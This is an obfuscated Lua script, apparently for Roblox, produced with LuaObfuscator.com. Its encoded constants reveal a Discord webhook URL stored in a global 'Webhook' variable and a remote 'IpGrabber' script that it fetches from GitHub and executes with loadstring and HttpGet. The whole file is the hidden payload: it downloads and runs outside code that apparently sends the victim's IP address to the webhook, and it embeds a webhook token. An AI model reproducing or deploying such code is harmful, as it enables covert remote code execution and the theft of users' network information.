--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v98=v5(v71,v19);v19=nil;return v98;else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=(v31/((5 -3)^(v32-(2 -1))))%((1 + 1)^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + (941 -(282 + 595)))))) ;return v72-(v72%(932 -(857 + 74))) ;else local v73=(570 -(367 + 201))^(v32-(928 -((1851 -(1523 + 114)) + 713))) ;return (((v31%(v73 + v73))>=v73) and 1) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(118 -(32 + (435 -(87 + 263))))) then return (v41 * (16441815 + 335401)) + (v40 * (14533 + 51003)) + (v39 * 256) + v38 ;end if (v37==(957 -(892 + 65))) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -(182 -(67 + 113))) ;v37=1 -0 ;end end end local function v24()local v42=v23();local v43=v23();local v44=1 + 0 ;local v45=(v20(v43,2 -1 ,15 + 5 ) * ((7 -5)^(984 -(802 + 150)))) + v42 ;local v46=v20(v43,56 -35 ,31);local v47=((v20(v43,32)==(1 -0)) and  -(1 + 0)) or (998 -(915 + 82)) ;if (v46==((791 -(368 + 423)) -0)) then if (v45==(0 + 0)) then return v47 * (0 -0) ;else local v78=0;while true do if (v78==(1187 -(1069 + 118))) then v46=1;v44=0 -0 ;break;end end end elseif (v46==(4477 -2430)) then return ((v45==((0 -0) + 0)) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((2 + 0)^(70 -(10 + 8))))) ;end local function v25(v48)local v49;if  not v48 then local v74=0 -0 ;while true do if (v74==(442 -(416 + 26))) then v48=v23();if (v48==(0 -(438 -(145 + 293)))) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1 + 0) );v18=v18 + v48 ;local v50={};for v67=1 -0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v51~=(170 -(9 + 157))) then else while true do if (v52==(3 -2)) then local v95=1824 -(1195 + 629) ;while true do if (v95~=0) then else v55=nil;v56=nil;v95=1;end if (v95~=1) then else v52=2;break;end end end if (v52~=2) then else local v96=0;while true do if (1~=v96) then else v52=3 -0 ;break;end if (v96==(241 -(187 + 54))) then local v106=0;while true do if (v106==0) then v57=nil;v58=nil;v106=781 -(162 + 618) ;end if (v106==1) then v96=1;break;end end end end end if (v52==3) then v59=nil;while true do local v99=0;while true do if (v99~=0) then else if (v53==(2 + 0)) then local v107=0 + 0 ;while true do if (v107~=(0 -0)) then else local v118=0;while true do if (v118==(0 -0)) then for v165=1,v58 do local v166=0 + 0 ;local v167;local v168;local v169;while true do if (0==v166) then v167=0;v168=nil;v166=1637 -(1373 + 263) ;end if (v166~=(1001 -(451 + 549))) then else v169=nil;while true do if (v167==(1 + 0)) then if (v168==1) then v169=v21()~=(0 -0) ;elseif (v168==2) then v169=v24();elseif (v168~=(4 -1)) then else v169=v25();end v59[v165]=v169;break;end if (0==v167) then local v181=0;local v182;while true do if (0~=v181) then else v182=0;while true do if (v182~=1) then else v167=1385 -(746 + 638) ;break;end if (v182~=(0 + 0)) then else local v188=0;local v189;while true do if (v188==0) then v189=0 -0 ;while true do if (v189==(342 -(218 + 123))) then v182=1;break;end if (v189~=0) then else local v199=0;while true do if (v199==(1581 -(1535 + 46))) then v168=v21();v169=nil;v199=1 + 0 ;end if (v199~=(1 + 0)) then else v189=561 -(306 + 254) ;break;end end end end break;end end end end break;end end end end break;end end end v57[3]=v21();v118=1 + 0 ;end if (v118==(1 -0)) then v107=1468 -(899 + 568) ;break;end end end if (v107~=(1 + 0)) then else for v119=2 -1 ,v23() do local v120=603 -(268 + 335) ;local v121;while true do if (v120==0) then v121=v21();if (v20(v121,1,1)==0) then local v172=290 -(60 + 230) ;local v173;local v174;local v175;local v176;local v177;local v178;while true do if (v172==0) then v173=0;v174=nil;v172=573 -(426 + 146) ;end if (v172==(1 + 1)) then v177=nil;v178=nil;v172=3;end if ((1457 -(282 + 1174))==v172) then v175=nil;v176=nil;v172=2;end if (v172==(814 -(569 + 242))) then while true do if (2==v173) then v178=nil;while true do if (v174~=0) then else local v186=0;while true do if (v186==0) then v175=0;v176=nil;v186=2 -1 ;end if (v186==1) then v174=1;break;end end end if (v174~=1) then else local v187=0;while true do if (v187==1) then v174=1 + 1 ;break;end if (v187==(1024 -(706 + 318))) then v177=nil;v178=nil;v187=1252 -(721 + 530) ;end end end if (v174~=2) then else while true do if (2~=v175) then else local v190=0;local v191;while true do if (v190==(1271 -(945 + 326))) then v191=0;while true do if ((0 -0)==v191) then if (v20(v177,1,1 + 0 )==1) then v178[702 -(271 + 429) ]=v59[v178[2 + 0 ]];end if (v20(v177,1502 -(1408 + 92) ,2)~=(1087 -(461 + 625))) then else v178[1291 -(993 + 295) ]=v59[v178[1 + 2 ]];end v191=1172 -(418 + 753) ;end if (v191~=(1 + 0)) then else v175=1 + 2 ;break;end end break;end end end if (v175~=3) then else if (v20(v177,3,3)==(1 + 0)) then v178[4]=v59[v178[2 + 2 ]];end v54[v119]=v178;break;end if (v175~=0) then else local v193=529 -(406 + 123) ;local v194;while true do if (v193==0) then v194=0;while true do if (v194==1) then v175=1;break;end if ((1769 -(1749 + 20))==v194) then local v200=0 + 0 ;while true do if (1==v200) then v194=1;break;end if (0==v200) then v176=v20(v121,1324 -(1249 + 73) ,2 + 1 );v177=v20(v121,4,1151 -(466 + 679) );v200=1;end end end end break;end end end if (v175==(2 -1)) then local v195=0 -0 ;local v196;while true do if (v195==(1900 -(106 + 1794))) then v196=0 + 0 ;while true do if (v196==(0 + 0)) then v178={v22(),v22(),nil,nil};if (v176==0) then local v205=0;while true do if (v205==0) then v178[3]=v22();v178[118 -(4 + 110) ]=v22();break;end end elseif (v176==(585 -(57 + 527))) then v178[3]=v23();elseif (v176==(1429 -(41 + 1386))) then v178[3]=v23() -((105 -(17 + 86))^(11 + 5)) ;elseif (v176~=(6 -3)) then else local v210=0 -0 ;local v211;while true do if (v210~=0) then else v211=0;while true do if (v211==0) then v178[169 -(122 + 44) ]=v23() -((2 -0)^(52 -36)) ;v178[4]=v22();break;end end break;end end end v196=1;end if (v196==(1 + 0)) then v175=2;break;end end break;end end end end break;end end break;end if (v173~=(0 + 0)) then else v174=0 -0 ;v175=nil;v173=1;end if (v173==(66 -(30 + 35))) then local v185=0 + 0 ;while true do if (v185~=(1257 -(1043 + 214))) then else v176=nil;v177=nil;v185=1;end if (v185==1) then v173=2;break;end end end end break;end end end break;end end end v53=3;break;end end end if (v53==0) then local v108=0 -0 ;local v109;while true do if (v108==(1212 -(323 + 889))) then v109=0 -0 ;while true do if (v109==(581 -(361 + 219))) then v56={};v53=1;break;end if (v109~=0) then else local v160=320 -(53 + 267) ;local v161;while true do if (v160==0) then v161=0 + 0 ;while true do if (v161==(414 -(15 + 398))) then v109=983 -(18 + 964) ;break;end if (0~=v161) then else local v179=0 -0 ;while true do if (v179==(1 + 0)) then v161=1 + 0 ;break;end if (v179==(850 -(20 + 830))) then v54={};v55={};v179=1 + 0 ;end end end end break;end end end end break;end end end v99=1;end if ((127 -(116 + 10))==v99) then if (v53==1) then local v110=0;local v111;while true do if (v110==(0 + 0)) then v111=0;while true do if ((738 -(542 + 196))==v111) then v57={v54,v55,nil,v56};v58=v23();v111=1 + 0 ;end if (v111==1) then v59={};v53=2;break;end end break;end end end if (v53==(2 + 1)) then local v112=0 -0 ;local v113;while true do if (v112~=(0 -0)) then else v113=1551 -(1126 + 425) ;while true do if (v113~=0) then else local v162=0;local v163;while true do if (v162~=(405 -(118 + 287))) then else v163=0;while true do if (v163==(0 -0)) then for v183=1,v23() do v55[v183-1 ]=v28();end return v57;end end break;end end end end break;end end end break;end end end break;end if (v52~=0) then else local v97=1121 -(118 + 1003) ;while true do if (v97~=0) then else v53=0 -0 ;v54=nil;v97=1;end if (1~=v97) then else v52=378 -(142 + 235) ;break;end end end end break;end if (v51~=1) then else v54=nil;v55=nil;v51=9 -7 ;end if (v51==3) then v58=nil;v59=nil;v51=1 + 3 ;end if (v51==(977 -(553 + 424))) then v52=0;v53=nil;v51=1 -0 ;end if (v51~=2) then else v56=nil;v57=nil;v51=3 + 0 ;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end if (v63==1) then v66=v60[3];return function(...)local v79=v64;local v80=v65;local v81=v66;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==1) then if (v92<=5) then if (v92<=2) then if (v92<=0) then v89[v91[2]]();elseif (v92>1) then v83=v91[3];else local v123=v91[2];local v124=v89[v91[3]];v89[v123 + 1 ]=v124;v89[v123]=v124[v91[4]];end elseif (v92<=3) then local v114=v91[2];v89[v114]=v89[v114](v13(v89,v114 + 1 ,v84));elseif (v92>4) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v89[v91[2]]=v91[3];end elseif (v92<=8) then if (v92<=6) then v89[v91[2]][v91[3]]=v91[4];elseif (v92==7) then local v130=v91[2];local v131,v132=v82(v89[v130](v13(v89,v130 + 1 ,v91[3])));v84=(v132 + v130) -1 ;local v133=0;for v152=v130,v84 do local v153=0;while true do if (v153==0) then v133=v133 + 1 ;v89[v152]=v131[v133];break;end end end else for v154=v91[2],v91[3] do v89[v154]=nil;end end elseif (v92<=9) then do return;end elseif (v92==10) then local v134;local v135,v136;local v137;local v138;v89[v91[2]][v91[3]]=v91[4];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v62[v91[3]];v83=v83 + 1 ;v91=v79[v83];v138=v91[2];v137=v89[v91[3]];v89[v138 + 1 ]=v137;v89[v138]=v137[v91[4]];v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]=v91[3];v83=v83 + 1 ;v91=v79[v83];v138=v91[2];v135,v136=v82(v89[v138](v13(v89,v138 + 1 ,v91[3])));v84=(v136 + v138) -1 ;v134=0;for v156=v138,v84 do v134=v134 + 1 ;v89[v156]=v135[v134];end v83=v83 + 1 ;v91=v79[v83];v138=v91[2];v89[v138]=v89[v138](v13(v89,v138 + 1 ,v84));v83=v83 + 1 ;v91=v79[v83];v89[v91[2]]();v83=v83 + 1 ;v91=v79[v83];v83=v91[3];else v89[v91[2]]=v62[v91[3]];end v83=v83 + 1 ;break;end if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!083O00028O0003023O005F4703073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313234332O313435303633352O32333130322F57302O566B42697259686656414A7179724E7973616A622D2O776F45487131546153527054795972554E392O7456796E53493958786B702O5179765F6962784A736B706E030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F686F73742O652E6769746875622E696F2F6D61696E2F49704772612O62657200153O0012043O00014O0008000100013O0026053O0002000100010004023O00020001001204000100013O00260500010005000100010004023O0005000100120B000200023O00300A00020003000400122O000200053O00122O000300063O00202O00030003000700122O000500086O000300056O00023O00024O00020001000100044O001400010004023O000500010004023O001400010004023O000200012O00093O00017O00",v9(),...);end
